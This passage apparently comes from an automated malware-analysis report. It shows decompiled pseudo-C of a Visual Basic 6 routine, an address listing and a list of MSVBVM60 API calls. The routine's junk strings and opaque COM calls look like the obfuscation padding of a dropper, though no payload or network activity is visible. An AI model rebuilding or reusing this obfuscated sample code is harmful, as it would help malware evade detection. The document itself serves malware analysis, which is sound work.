					if( *0x4223c0 != 0) {
						_v436 = 0x4223c0;
					} else {
						_push(0x4223c0);
						_push(0x40258c);
						L004017CE();
						_v436 = 0x4223c0;
					}
					_v380 =  *_v436;
					_t921 =  *((intOrPtr*)( *_v380 + 0x14))(_v380,  &_v168);
					asm("fclex");
					_v384 = _t921;
					if(_v384 >= 0) {
						_v440 = _v440 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x40257c);
						_push(_v380);
						_push(_v384);
						L004017C8();
						_v440 = _t921;
					}
					_v388 = _v168;
					_t926 =  *((intOrPtr*)( *_v388 + 0x70))(_v388,  &_v332);
					asm("fclex");
					_v392 = _t926;
					if(_v392 >= 0) {
						_v444 = _v444 & 0x00000000;
					} else {
						_push(0x70);
						_push(0x40259c);
						_push(_v388);
						_push(_v392);
						L004017C8();
						_v444 = _t926;
					}
					_t676 = _v332;
					_v104 = _t676;
					L004017C2();
				}
				L004017BC();
				L0040183A();
				L004017BC();
				L0040183A();
				_v404 = _v152;
				_v152 = _v152 & 0x00000000;
				L0040183A();
				 *((intOrPtr*)( *_a4 + 0x728))(_a4,  &_v148, 0x790eaf, 0x4849, 0x51ac, _t676, L"tilskrersaksene");
				L004017D4();
				_v176 = 0x80020004;
				_v184 = 0xa;
				_t685 =  &_v184;
				L004017F2();
				_v344 = _t685;
				_v336 = 0x6988;
				L004017B6();
				_v348 = 0x10e914;
				_v332 = _v344;
				 *((intOrPtr*)( *_a4 + 0x72c))(_a4,  &_v332,  &_v348, 0x2f8e,  &_v144,  &_v336,  &_v340, _t685, 3,  &_v144,  &_v148,  &_v152);
				_t695 = _v340;
				_v52 = _t695;
				L00401846();
				L00401828();
				_v348 = 0x40f600;
				L004017B0();
				L0040183A();
				 *((intOrPtr*)( *_a4 + 0x730))(_a4,  &_v348, _t695, L"Forretningsbrevet5");
				L00401846();
				L004017B6();
				_t704 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4, 0x17c6,  &_v144,  &_v148);
				_v380 = _t704;
				if(_v380 >= 0) {
					_v448 = _v448 & 0x00000000;
				} else {
					_push(0x6f8);
					_push(0x402330);
					_push(_a4);
					_push(_v380);
					L004017C8();
					_v448 = _t704;
				}
				_v408 = _v148;
				_v148 = _v148 & 0x00000000;
				L0040183A();
				L00401846();
				L004017AA();
				_v368 = _t1082;
				_v176 = _v368;
				_v184 = 4;
				_push( &_v200);
				_t707 =  &_v184;
				_push(_t707);
				L004017A4();
				_v380 = _t707;
				if(_v380 >= 0) {
					_v452 = _v452 & 0x00000000;
				} else {
					_push(_v380);
					L0040179E();
					_v452 = _t707;
				}
				L00401792();
				_t708 =  &_v168;
				L00401798();
				_v384 = _t708;
				_t712 =  *((intOrPtr*)( *_v384 + 0x1c))(_v384,  &_v348, _t708, _t707);
				asm("fclex");
				_v388 = _t712;
				if(_v388 >= 0) {
					_v456 = _v456 & 0x00000000;
				} else {
					_push(0x1c);
					_push(0x40265c);
					_push(_v384);
					_push(_v388);
					L004017C8();
					_v456 = _t712;
				}
				_v364 = 0xed488;
				_v360 = 0x711cb2;
				_t713 =  &_v200;
				L0040178C();
				_v356 = _t713;
				_v352 = 0x23dec;
				_t720 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4,  &_v352, 0x3e2bce,  &_v356, _v348,  &_v360,  &_v364, _t713);
				_v392 = _t720;
				if(_v392 >= 0) {
					_v460 = _v460 & 0x00000000;
				} else {
					_push(0x6fc);
					_push(0x402330);
					_push(_a4);
					_push(_v392);
					L004017C8();
					_v460 = _t720;
				}
				L004017C2();
				_t722 =  &_v184;
				L00401840();
				L00401786();
				L0040183A();
				L004017EC();
				_v340 = _t722;
				_v176 = 0x80020004;
				_v184 = 0xa;
				_t723 =  &_v184;
				L004017F2();
				_v344 = _t723;
				L00401780();
				_v348 = _t723;
				_v336 = _v344;
				_v332 = _v340;
				_t731 =  *((intOrPtr*)( *_a4 + 0x700))(_a4,  &_v332, L"blaarv", 0x35a58,  &_v336,  &_v348, _t723, _t722, 0x9b, 2, _t722,  &_v200);
				_v380 = _t731;
				if(_v380 >= 0) {
					_v464 = _v464 & 0x00000000;
				} else {
					_push(0x700);
					_push(0x402330);
					_push(_a4);
					_push(_v380);
					L004017C8();
					_v464 = _t731;
				}
				L00401846();
				L00401828();
				_v176 = 0x80020004;
				_v184 = 0xa;
				_t732 =  &_v184;
				L004017F2();
				_v336 = _t732;
				_v332 = _v336;
				_t737 =  *((intOrPtr*)( *_a4 + 0x704))(_a4,  &_v332, L"Lersernes", _t732);
				_v380 = _t737;
				if(_v380 >= 0) {
					_v468 = _v468 & 0x00000000;
				} else {
					_push(0x704);
					_push(0x402330);
					_push(_a4);
					_push(_v380);
					L004017C8();
					_v468 = _t737;
				}
				L00401828();
				_v176 = 0x80020004;
				_v184 = 0xa;
				_t738 =  &_v184;
				_push(_t738);
				L004017F2();
				_v336 = _t738;
				_v192 =  *0x40124c;
				_v200 = 4;
				_push(0);
				_push( &_v200);
				_push( &_v216);
				L0040177A();
				_v224 = 0x80020004;
				_v232 = 0xa;
				_t741 =  &_v232;
				_push(_t741);
				L004017F2();
				_v340 = _t741;
				_t1086 =  *0x401248;
				_v240 = _t1086;
				_v248 = 4;
				_push( &_v264);
				_t743 =  &_v248;
				_push(_t743);
				L004017A4();
				_v380 = _t743;
				if(_v380 >= 0) {
					_v472 = _v472 & 0x00000000;
				} else {
					_push(_v380);
					L0040179E();
					_v472 = _t743;
				}
				_v332 = _v340;
				_v352 = 0x1eaaee;
				_t745 =  &_v216;
				L0040178C();
				_v348 = _t745;
				_t747 =  &_v264;
				L0040178C();
				 *((intOrPtr*)( *_a4 + 0x734))(_a4, _v336,  &_v348,  &_v352, L"Snoreskrternes8",  &_v332, L"tril", _t747, _t747,  &_v356, _t745);
				_v136 = _v356;
				L00401840();
				L00401774();
				_v376 = _t1086;
				L0040185E();
				L0040183A();
				_t761 = _v156;
				_v412 = _t761;
				_v156 = _v156 & 0x00000000;
				L0040176E();
				_v348 = _t761;
				L004017B6();
				_t762 =  &_v152;
				L0040183A();
				 *((intOrPtr*)( *_a4 + 0x738))(_a4,  &_v144,  &_v348, _t762, L"Benefact6", _t762, L"RODTEGNENES", L"eudaemonistical", 6,  &_v184,  &_v200,  &_v232,  &_v248,  &_v216,  &_v264);
				_v416 = _v152;
				_v152 = _v152 & 0x00000000;
				L0040183A();
				_t771 =  &_v144;
				L004017D4();
				L004017EC();
				_v336 = _t771;
				_v176 = 0x1ca534;
				_v184 = 3;
				_t772 =  &_v184;
				L004017E6();
				L0040183A();
				L00401768();
				_v352 = _t772;
				_v332 = _v336;
				_v348 = 0x761fa7;
				_t776 =  &_v332;
				L00401762();
				_t780 =  *((intOrPtr*)( *_a4 + 0x708))(_a4,  &_v348, _t776, L"Whiskysourens1", _t776,  &_v352,  &_v144, _t772, L"ADMIRINGLY", 3, _t771,  &_v148,  &_v156);
				_v380 = _t780;
				if(_v380 >= 0) {
					_v476 = _v476 & 0x00000000;
				} else {
					_push(0x708);
					_push(0x402330);
					_push(_a4);
					_push(_v380);
					L004017C8();
					_v476 = _t780;
				}
				L00401846();
				L00401828();
				L004017EC();
				_v340 = _t780;
				_v332 = 0x640;
				 *((intOrPtr*)( *_a4 + 0x73c))(_a4, _v340,  &_v332,  &_v336, L"Kainsmrkernes3");
				_v132 = _v336;
				 *((intOrPtr*)( *_a4 + 0x740))(_a4,  &_v332);
				_v84 = _v332;
				_v336 = 0x393d;
				_v332 = 0x67ff;
				L004017B6();
				_t797 =  *((intOrPtr*)( *_a4 + 0x70c))(_a4, L"Odontoma7", L"undrede",  &_v144, 0x2745,  &_v332, 0x239fb0,  &_v336);
				_v380 = _t797;
				if(_v380 >= 0) {
					_v480 = _v480 & 0x00000000;
				} else {
					_push(0x70c);
					_push(0x402330);
					_push(_a4);
					_push(_v380);
					L004017C8();
					_v480 = _t797;
				}
				L00401846();
				_v352 = 0x419a61;
				_v348 = 0x5ea767;
				_t802 =  *((intOrPtr*)( *_a4 + 0x710))(_a4, L"Utrecht8",  &_v348, 0x5f1f,  &_v352);
				_v380 = _t802;
				if(_v380 >= 0) {
					_v484 = _v484 & 0x00000000;
				} else {
					_push(0x710);
					_push(0x402330);
					_push(_a4);
					_push(_v380);
					L004017C8();
					_v484 = _t802;
				}
				_v272 = 0x402850;
				_v280 = 8;
				L0040184C();
				L0040175C();
				L00401834();
				L0040183A();
				L004017B6();
				_v336 = 0x54f7;
				_v332 = 0x147e;
				_t808 =  &_v144;
				L00401762();
				 *((intOrPtr*)( *_a4 + 0x744))(_a4,  &_v332, 0x5c23,  &_v336, _t808, L"Udstillingslokalet", _t808,  &_v148, 0xfffc6,  &_v348,  &_v200,  &_v200, 0x65,  &_v184);
				_v44 = _v348;
				L004017D4();
				L00401840();
				_v176 = 0xfffffff6;
				_v184 = 2;
				_t819 =  &_v184;
				L00401804();
				L0040183A();
				L00401762();
				_t822 =  *((intOrPtr*)( *_a4 + 0x714))(_a4, 0xf03, _t819, _t819, _t819, 0, 2,  &_v184,  &_v200, 2,  &_v144,  &_v148);
				_v380 = _t822;
				if(_v380 >= 0) {
					_v488 = _v488 & 0x00000000;
				} else {
					_push(0x714);
					_push(0x402330);
					_push(_a4);
					_push(_v380);
					L004017C8();
					_v488 = _t822;
				}
				L00401846();
				L00401828();
				L004017E0();
				_v348 = _t822;
				_t827 =  *((intOrPtr*)( *_a4 + 0x718))(_a4,  &_v348, 0x472f27, 0x451752,  &_v352, L"Generalisations7");
				_v380 = _t827;
				if(_v380 >= 0) {
					_v492 = _v492 & 0x00000000;
				} else {
					_push(0x718);
					_push(0x402330);
					_push(_a4);
					_push(_v380);
					L004017C8();
					_v492 = _t827;
				}
				_v100 = _v352;
				L00401756();
				L0040183A();
				L00401750();
				L0040183A();
				_v420 = _v164;
				_v164 = _v164 & 0x00000000;
				L0040183A();
				_v424 = _v160;
				_v160 = _v160 & 0x00000000;
				L004017B6();
				_t832 =  &_v152;
				L0040183A();
				_t836 =  *((intOrPtr*)( *_a4 + 0x71c))(_a4,  &_v144, _t832, _t832, L"SOLITRSKAKKEN", L"Indvi2", L"Fdres",  &_v156, L"STRUTTENDE", 0x17, 0x67);
				_v380 = _t836;
				if(_v380 >= 0) {
					_v496 = _v496 & 0x00000000;
				} else {
					_push(0x71c);
					_push(0x402330);
					_push(_a4);
					_push(_v380);
					L004017C8();
					_v496 = _t836;
				}
				_v428 = _v156;
				_v156 = _v156 & 0x00000000;
				L0040183A();
				_push( &_v164);
				_push( &_v160);
				_push( &_v152);
				_push( &_v148);
				_t842 =  &_v144;
				_push(_t842);
				_push(5);
				L004017D4();
				asm("fabs");
				_v176 =  *0x401238;
				asm("fnstsw ax");
				if((_t842 & 0x0000000d) != 0) {
					return __imp____vbaFPException();
				}
				_v184 = 5;
				_push( &_v200);
				_t845 =  &_v184;
				_push(_t845);
				L004017A4();
				_v380 = _t845;
				if(_v380 >= 0) {
					_v500 = _v500 & 0x00000000;
				} else {
					_push(_v380);
					L0040179E();
					_v500 = _t845;
				}
				L0040182E();
				_t848 =  &_v144;
				L00401858();
				L004017BC();
				L0040183A();
				_v224 = 0x80020004;
				_v232 = 0xa;
				_t849 =  &_v232;
				L004017F2();
				_v340 = _t849;
				_v332 = _v340;
				_v432 = _v152;
				_v152 = _v152 & 0x00000000;
				_t853 =  &_v332;
				L0040183A();
				_t854 =  &_v200;
				L0040178C();
				_t857 =  *((intOrPtr*)( *_a4 + 0x720))(_a4, _t854, _t854, _t853, _t853, 0x3d78c1,  &_v336, _t849, _t848, _t848,  &_v216,  &_v216, L"16:16:16");
				_v384 = _t857;
				if(_v384 >= 0) {
					_v504 = _v504 & 0x00000000;
				} else {
					_push(0x720);
					_push(0x402330);
					_push(_a4);
					_push(_v384);
					L004017C8();
					_v504 = _t857;
				}
				_v92 = _v336;
				L004017D4();
				_t865 =  &_v184;
				L00401840();
				L004017EC();
				_v336 = _t865;
				L004017EC();
				_v340 = _t865;
				L004017B6();
				_v332 = 0x2885;
				 *((intOrPtr*)( *_a4 + 0x748))(_a4, _v336, L"SELVFINANSIEREDES",  &_v332, _v340,  &_v144, 0x5929, 0x402958, 0x402910, 4, _t865,  &_v216,  &_v232,  &_v200, 3,  &_v144,  &_v148,  &_v152);
				L00401846();
				E00421511();
				_v272 = 2;
				_v280 = 2;
				L0040174A();
				_v272 = 0x806d6c;
				_v280 = 3;
				L0040174A();
				_t874 =  &_v184;
				L00401744();
				L0040178C();
				 *((intOrPtr*)( *_a4 + 0x74c))(_a4, _t874, _t874, _t874,  &_v40,  &_v128);
				_v8 = 0;
				asm("wait");
				_push(0x41da78);
				L00401828();
				L00401846();
				_v348 =  &_v76;
				_t879 =  &_v348;
				_push(_t879);
				_push(0);
				L0040173E();
				L00401846();
				L00401846();
				L00401846();
				L00401846();
				L00401828();
				L00401846();
				return _t879;
			}

0x0041c3e7
0x0041c3f6
0x0041c402
0x0041c40a
0x0041c40d
0x0041c41a
0x0041c423
0x0041c42e
0x0041c431
0x0041c433
0x0041c43b
0x0041c43c
0x0041c441
0x0041c44b
0x0041c461
0x0041c46c
0x0041c473
0x0041c474
0x0041c47f
0x0041c480
0x0041c486
0x0041c487
0x0041c48c
0x0041c48d
0x0041c492
0x0041c498
0x0041c4a2
0x0041c4a8
0x0041c4a9
0x0041c4b1
0x0041c4b6
0x0041c4bd
0x0041c4c3
0x0041c4ce
0x0041c4d5
0x0041c4dc
0x0041c4dd
0x0041c4df
0x0041c4e4
0x0041c4f0
0x0041c4f6
0x0041c4fb
0x0041c501
0x0041c502
0x0041c507
0x0041c50d
0x0041c50e
0x0041c518
0x0041c523
0x0041c528
0x0041c532
0x0041c548
0x0041c54d
0x0041c553
0x0041c554
0x0041c55a
0x0041c55b
0x0041c560
0x0041c566
0x0041c567
0x0041c56e
0x0041c574
0x0041c579
0x0041c57e
0x0041c583
0x0041c58e
0x0041c593
0x0041c599
0x0041c59a
0x0041c5a0
0x0041c5a1
0x0041c5a3
0x0041c5a8
0x0041c5a8
0x0041c5b1
0x0041c5b2
0x0041c5bd
0x0041c5be
0x0041c5c4
0x0041c5c5
0x0041c5c6
0x0041c5c9
0x0041c5d4
0x0041c5d5
0x0041c5da
0x0041c5e4
0x0041c5f4
0x0041c5f5
0x0041c5fb
0x0041c5fc
0x0041c601
0x0041c60e
0x0041c615
0x0041c616
0x0041c618
0x0041c61d
0x0041c629
0x0041c62b
0x0041c635
0x0041c63f
0x0041c647
0x0041c648
0x0041c652
0x0041c65d
0x0041c668
0x0041c669
0x0041c674
0x0041c675
0x0041c67f
0x0041c68a
0x0041c68a
0x0041c68f
0x0041c699
0x0041c6af
0x0041c6b4
0x0041c6ba
0x0041c6bb
0x0041c6cb
0x0041c6d8
0x0041c6dd
0x0041c6e6
0x0041c6ef
0x0041c6f7
0x0041c6fd
0x0041c707
0x0041c711
0x0041c717
0x0041c718
0x0041c71f
0x0041c725
0x0041c72f
0x0041c736
0x0041c73d
0x0041c745
0x0041c74c
0x0041c754
0x0041c75b
0x0041c763
0x0041c76a
0x0041c770
0x0041c77a
0x0041c790
0x0041c795
0x0041c79b
0x0041c79c
0x0041c79e
0x0041c7ab
0x0041c7b0
0x0041c7b1
0x0041c7b6
0x0041c7bc
0x0041c7c6
0x0041c7cc
0x0041c7cd
0x0041c7da
0x0041c7df
0x0041c7e0
0x0041c7e7
0x0041c7ee
0x0041c7f8
0x0041c7ff
0x0041c800
0x0041c802
0x0041c810
0x0041c817
0x0041c818
0x0041c81a
0x0041c81f
0x0041c824
0x0041c82b
0x0041c833
0x0041c83a
0x0041c842
0x0041c849
0x0041c84f
0x0041c859
0x0041c863
0x0041c869
0x0041c86a
0x0041c871
0x0041c878
0x0041c882
0x0041c889
0x0041c890
0x0041c898
0x0041c89f
0x0041c8a7
0x0041c8a8
0x0041c8ae
0x0041c8b4
0x0041c8b9
0x0041c8c0
0x0041c8c7
0x0041c8cd
0x0041c8d4
0x0041c8dc
0x0041c8e3
0x0041c8eb
0x0041c8ec
0x0041c8f2
0x0041c8f8
0x0041c8fd
0x0041c904
0x0041c90b
0x0041c916
0x0041c933
0x0041c918
0x0041c918
0x0041c91d
0x0041c922
0x0041c927
0x0041c927
0x0041c945
0x0041c960
0x0041c963
0x0041c965
0x0041c972
0x0041c994
0x0041c974
0x0041c974
0x0041c976
0x0041c97b
0x0041c981
0x0041c987
0x0041c98c
0x0041c98c
0x0041c9a1
0x0041c9bc
0x0041c9bf
0x0041c9c1
0x0041c9ce
0x0041c9f0
0x0041c9d0
0x0041c9d0
0x0041c9d2
0x0041c9d7
0x0041c9dd
0x0041c9e3
0x0041c9e8
0x0041c9e8
0x0041c9f7
0x0041c9fe
0x0041ca08
0x0041ca08
0x0041ca12
0x0041ca1f
0x0041ca25
0x0041ca32
0x0041ca3d
0x0041ca43
0x0041ca56
0x0041ca79
0x0041ca96
0x0041ca9e
0x0041caa8
0x0041cab2
0x0041cab9
0x0041cabe
0x0041cac5
0x0041cad9
0x0041cade
0x0041caef
0x0041cb26
0x0041cb2c
0x0041cb33
0x0041cb3d
0x0041cb48
0x0041cb4d
0x0041cb5c
0x0041cb69
0x0041cb7e
0x0041cb8a
0x0041cb9a
0x0041cbba
0x0041cbc0
0x0041cbcd
0x0041cbef
0x0041cbcf
0x0041cbcf
0x0041cbd4
0x0041cbd9
0x0041cbdc
0x0041cbe2
0x0041cbe7
0x0041cbe7
0x0041cbfc
0x0041cc02
0x0041cc12
0x0041cc1d
0x0041cc22
0x0041cc27
0x0041cc33
0x0041cc39
0x0041cc49
0x0041cc4a
0x0041cc50
0x0041cc51
0x0041cc56
0x0041cc63
0x0041cc78
0x0041cc65
0x0041cc65
0x0041cc6b
0x0041cc70
0x0041cc70
0x0041cc7f
0x0041cc85
0x0041cc8c
0x0041cc91
0x0041ccac
0x0041ccaf
0x0041ccb1
0x0041ccbe
0x0041cce0
0x0041ccc0
0x0041ccc0
0x0041ccc2
0x0041ccc7
0x0041cccd
0x0041ccd3
0x0041ccd8
0x0041ccd8
0x0041cce7
0x0041ccf1
0x0041ccfb
0x0041cd02
0x0041cd07
0x0041cd0d
0x0041cd46
0x0041cd4c
0x0041cd59
0x0041cd7b
0x0041cd5b
0x0041cd5b
0x0041cd60
0x0041cd65
0x0041cd68
0x0041cd6e
0x0041cd73
0x0041cd73
0x0041cd88
0x0041cd94
0x0041cd9d
0x0041cdaa
0x0041cdb7
0x0041cdbd
0x0041cdc2
0x0041cdc9
0x0041cdd3
0x0041cddd
0x0041cde4
0x0041cde9
0x0041cdf6
0x0041cdfb
0x0041ce08
0x0041ce16
0x0041ce44
0x0041ce4a
0x0041ce57
0x0041ce79
0x0041ce59
0x0041ce59
0x0041ce5e
0x0041ce63
0x0041ce66
0x0041ce6c
0x0041ce71
0x0041ce71
0x0041ce86
0x0041ce91
0x0041ce96
0x0041cea0
0x0041ceaa
0x0041ceb1
0x0041ceb6
0x0041cec4
0x0041cedf
0x0041cee5
0x0041cef2
0x0041cf14
0x0041cef4
0x0041cef4
0x0041cef9
0x0041cefe
0x0041cf01
0x0041cf07
0x0041cf0c
0x0041cf0c
0x0041cf21
0x0041cf26
0x0041cf30
0x0041cf3a
0x0041cf40
0x0041cf41
0x0041cf46
0x0041cf53
0x0041cf59
0x0041cf63
0x0041cf6b
0x0041cf72
0x0041cf73
0x0041cf78
0x0041cf82
0x0041cf8c
0x0041cf92
0x0041cf93
0x0041cf98
0x0041cf9f
0x0041cfa5
0x0041cfab
0x0041cfbb
0x0041cfbc
0x0041cfc2
0x0041cfc3
0x0041cfc8
0x0041cfd5
0x0041cfea
0x0041cfd7
0x0041cfd7
0x0041cfdd
0x0041cfe2
0x0041cfe2
0x0041cff8
0x0041cfff
0x0041d009
0x0041d010
0x0041d015
0x0041d022
0x0041d029
0x0041d05c
0x0041d068
0x0041d09a
0x0041d0a7
0x0041d0ac
0x0041d0b7
0x0041d0c4
0x0041d0c9
0x0041d0cf
0x0041d0d5
0x0041d0e2
0x0041d0e7
0x0041d0f8
0x0041d0fd
0x0041d115
0x0041d131
0x0041d13d
0x0041d143
0x0041d156
0x0041d169
0x0041d172
0x0041d17f
0x0041d184
0x0041d18b
0x0041d195
0x0041d19f
0x0041d1a6
0x0041d1b3
0x0041d1be
0x0041d1c3
0x0041d1d0
0x0041d1d7
0x0041d1ef
0x0041d1fb
0x0041d210
0x0041d216
0x0041d223
0x0041d245
0x0041d225
0x0041d225
0x0041d22a
0x0041d22f
0x0041d232
0x0041d238
0x0041d23d
0x0041d23d
0x0041d252
0x0041d25d
0x0041d267
0x0041d26c
0x0041d273
0x0041d298
0x0041d2a5
0x0041d2b8
0x0041d2c5
0x0041d2c9
0x0041d2d2
0x0041d2e6
0x0041d31c
0x0041d322
0x0041d32f
0x0041d351
0x0041d331
0x0041d331
0x0041d336
0x0041d33b
0x0041d33e
0x0041d344
0x0041d349
0x0041d349
0x0041d35e
0x0041d363
0x0041d36d
0x0041d397
0x0041d39d
0x0041d3aa
0x0041d3cc
0x0041d3ac
0x0041d3ac
0x0041d3b1
0x0041d3b6
0x0041d3b9
0x0041d3bf
0x0041d3c4
0x0041d3c4
0x0041d3d3
0x0041d3dd
0x0041d3f3
0x0041d408
0x0041d414
0x0041d421
0x0041d431
0x0041d436
0x0041d43f
0x0041d45b
0x0041d467
0x0041d488
0x0041d494
0x0041d4a7
0x0041d4bf
0x0041d4c7
0x0041d4d1
0x0041d4dd
0x0041d4e4
0x0041d4f1
0x0041d4f7
0x0041d50a
0x0041d510
0x0041d51d
0x0041d53f
0x0041d51f
0x0041d51f
0x0041d524
0x0041d529
0x0041d52c
0x0041d532
0x0041d537
0x0041d537
0x0041d54c
0x0041d557
0x0041d561
0x0041d566
0x0041d58c
0x0041d592
0x0041d59f
0x0041d5c1
0x0041d5a1
0x0041d5a1
0x0041d5a6
0x0041d5ab
0x0041d5ae
0x0041d5b4
0x0041d5b9
0x0041d5b9
0x0041d5ce
0x0041d5d3
0x0041d5e0
0x0041d5ec
0x0041d5f9
0x0041d604
0x0041d60a
0x0041d61d
0x0041d628
0x0041d62e
0x0041d640
0x0041d65b
0x0041d66e
0x0041d683
0x0041d689
0x0041d696
0x0041d6b8
0x0041d698
0x0041d698
0x0041d69d
0x0041d6a2
0x0041d6a5
0x0041d6ab
0x0041d6b0
0x0041d6b0
0x0041d6c5
0x0041d6cb
0x0041d6db
0x0041d6e6
0x0041d6ed
0x0041d6f4
0x0041d6fb
0x0041d6fc
0x0041d702
0x0041d703
0x0041d705
0x0041d713
0x0041d715
0x0041d71b
0x0041d71f
0x0040154c
0x0040154c
0x0041d725
0x0041d735
0x0041d736
0x0041d73c
0x0041d73d
0x0041d742
0x0041d74f
0x0041d764
0x0041d751
0x0041d751
0x0041d757
0x0041d75c
0x0041d75c
0x0041d777
0x0041d783
0x0041d78a
0x0041d790
0x0041d79d
0x0041d7a2
0x0041d7ac
0x0041d7b6
0x0041d7bd
0x0041d7c2
0x0041d7d0
0x0041d7dd
0x0041d7e3
0x0041d7f6
0x0041d809
0x0041d80f
0x0041d816
0x0041d824
0x0041d82a
0x0041d837
0x0041d859
0x0041d839
0x0041d839
0x0041d83e
0x0041d843
0x0041d846
0x0041d84c
0x0041d851
0x0041d851
0x0041d867
0x0041d882
0x0041d89f
0x0041d8a8
0x0041d8b5
0x0041d8ba
0x0041d8c6
0x0041d8cb
0x0041d8dd
0x0041d8e2
0x0041d917
0x0041d923
0x0041d928
0x0041d92d
0x0041d937
0x0041d94a
0x0041d94f
0x0041d959
0x0041d96c
0x0041d979
0x0041d980
0x0041d986
0x0041d994
0x0041d99a
0x0041d9a1
0x0041d9a2
0x0041da20
0x0041da28
0x0041da30
0x0041da36
0x0041da3c
0x0041da3d
0x0041da3f
0x0041da47
0x0041da4f
0x0041da57
0x0041da5f
0x0041da67
0x0041da72
0x0041da77

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041C402
__vbaAryConstruct2.MSVBVM60(?,004029BC,00000002,?,?,?,?,00401546), ref: 0041C43C
__vbaVarDup.MSVBVM60 ref: 0041C461
#522.MSVBVM60(?,?), ref: 0041C474
__vbaStrVarVal.MSVBVM60(?,?,?,?), ref: 0041C487
#713.MSVBVM60(00000000,?,?,?,?), ref: 0041C48D
#558.MSVBVM60(00000008,00000000,?,?,?,?), ref: 0041C4A9
__vbaFreeStr.MSVBVM60(00000008,00000000,?,?,?,?), ref: 0041C4C3
__vbaFreeVarList.MSVBVM60(00000003,?,?,00000008,00000008,00000000,?,?,?,?), ref: 0041C4DF
#541.MSVBVM60(?,7:7:7,?,?,?,00401546), ref: 0041C502
__vbaStrVarMove.MSVBVM60(?,?,7:7:7,?,?,?,00401546), ref: 0041C50E
__vbaStrMove.MSVBVM60(?,?,7:7:7,?,?,?,00401546), ref: 0041C518
__vbaFreeVar.MSVBVM60(?,?,7:7:7,?,?,?,00401546), ref: 0041C523
__vbaVarDup.MSVBVM60 ref: 0041C548
#524.MSVBVM60(?,?), ref: 0041C55B
__vbaStrVarVal.MSVBVM60(?,?,?,?), ref: 0041C56E
#690.MSVBVM60(multivalent,Bursati,CANNIBALEAN,00000000,?,?,?,?), ref: 0041C583
__vbaFreeStr.MSVBVM60(multivalent,Bursati,CANNIBALEAN,00000000,?,?,?,?), ref: 0041C58E
__vbaFreeVarList.MSVBVM60(00000002,?,?,multivalent,Bursati,CANNIBALEAN,00000000,?,?,?,?), ref: 0041C5A3
#610.MSVBVM60(?,?,?,?,00401546), ref: 0041C5B2
#661.MSVBVM60(?,0040250C,?,?,?,?,?,?,?,00401546), ref: 0041C5D5
__vbaVarTstGe.MSVBVM60(00008002,?), ref: 0041C5FC
__vbaFreeVarList.MSVBVM60(00000002,?,?,00008002,?), ref: 0041C618
#705.MSVBVM60(00000002,00000000), ref: 0041C648
__vbaStrMove.MSVBVM60(00000002,00000000), ref: 0041C652
__vbaFreeVar.MSVBVM60(00000002,00000000), ref: 0041C65D
#670.MSVBVM60(00000002,00000002,00000000), ref: 0041C669
__vbaStrVarMove.MSVBVM60(00000002,00000002,00000002,00000000), ref: 0041C675
__vbaStrMove.MSVBVM60(00000002,00000002,00000002,00000000), ref: 0041C67F
__vbaFreeVar.MSVBVM60(00000002,00000002,00000002,00000000), ref: 0041C68A
__vbaVarDup.MSVBVM60 ref: 0041C6AF
#560.MSVBVM60(?), ref: 0041C6BB
__vbaFreeVar.MSVBVM60(?), ref: 0041C6D8
#648.MSVBVM60(0000000A,?), ref: 0041C718
__vbaFreeVar.MSVBVM60(0000000A,?), ref: 0041C72F
__vbaVarDup.MSVBVM60(0000000A,?), ref: 0041C790
#606.MSVBVM60(00000010,0000000A,0000000A,?), ref: 0041C79E
__vbaStrMove.MSVBVM60(00000010,0000000A,0000000A,?), ref: 0041C7AB
__vbaLenBstr.MSVBVM60(00000000,00000010,0000000A,0000000A,?), ref: 0041C7B1
#574.MSVBVM60(00000003,00000000,00000010,0000000A,0000000A,?), ref: 0041C7CD
__vbaStrMove.MSVBVM60(00000003,00000000,00000010,0000000A,0000000A,?), ref: 0041C7DA
#696.MSVBVM60(00000000,00000003,00000000,00000010,0000000A,0000000A,?), ref: 0041C7E0
__vbaFreeStrList.MSVBVM60(00000002,?,?,00000000,00000003,00000000,00000010,0000000A,0000000A,?), ref: 0041C802
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,?,?,00401546), ref: 0041C81A
#648.MSVBVM60(0000000A), ref: 0041C86A
__vbaFreeVar.MSVBVM60(0000000A), ref: 0041C882
#696.MSVBVM60(OFFENTLIGHEDSSFRE,0000000A), ref: 0041C8B9
#696.MSVBVM60(Dagvagten,OFFENTLIGHEDSSFRE,0000000A), ref: 0041C8FD
__vbaNew2.MSVBVM60(0040258C,004223C0,Dagvagten,OFFENTLIGHEDSSFRE,0000000A), ref: 0041C922
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040257C,00000014), ref: 0041C987
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040259C,00000070), ref: 0041C9E3
__vbaFreeObj.MSVBVM60(00000000,?,0040259C,00000070), ref: 0041CA08
#519.MSVBVM60(tilskrersaksene,?), ref: 0041CA12
__vbaStrMove.MSVBVM60(tilskrersaksene,?), ref: 0041CA1F
#519.MSVBVM60(00000000,tilskrersaksene,?), ref: 0041CA25
__vbaStrMove.MSVBVM60(00000000,tilskrersaksene,?), ref: 0041CA32
__vbaStrMove.MSVBVM60(00000000,tilskrersaksene,?), ref: 0041CA56
__vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 0041CA96
#648.MSVBVM60(0000000A), ref: 0041CAB9
__vbaStrCopy.MSVBVM60 ref: 0041CAD9
__vbaFreeStr.MSVBVM60 ref: 0041CB3D
__vbaFreeVar.MSVBVM60 ref: 0041CB48
#527.MSVBVM60(Forretningsbrevet5), ref: 0041CB5C
__vbaStrMove.MSVBVM60(Forretningsbrevet5), ref: 0041CB69
__vbaFreeStr.MSVBVM60 ref: 0041CB8A
__vbaStrCopy.MSVBVM60 ref: 0041CB9A
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402330,000006F8), ref: 0041CBE2
__vbaStrMove.MSVBVM60(00000000,00401260,00402330,000006F8), ref: 0041CC12
__vbaFreeStr.MSVBVM60(00000000,00401260,00402330,000006F8), ref: 0041CC1D
#535.MSVBVM60(00000000,00401260,00402330,000006F8), ref: 0041CC22
#564.MSVBVM60(00000004,?), ref: 0041CC51
__vbaHresultCheck.MSVBVM60(00000000,00000004,?), ref: 0041CC6B
#685.MSVBVM60(00000004,?), ref: 0041CC7F
__vbaObjSet.MSVBVM60(?,00000000,00000004,?), ref: 0041CC8C
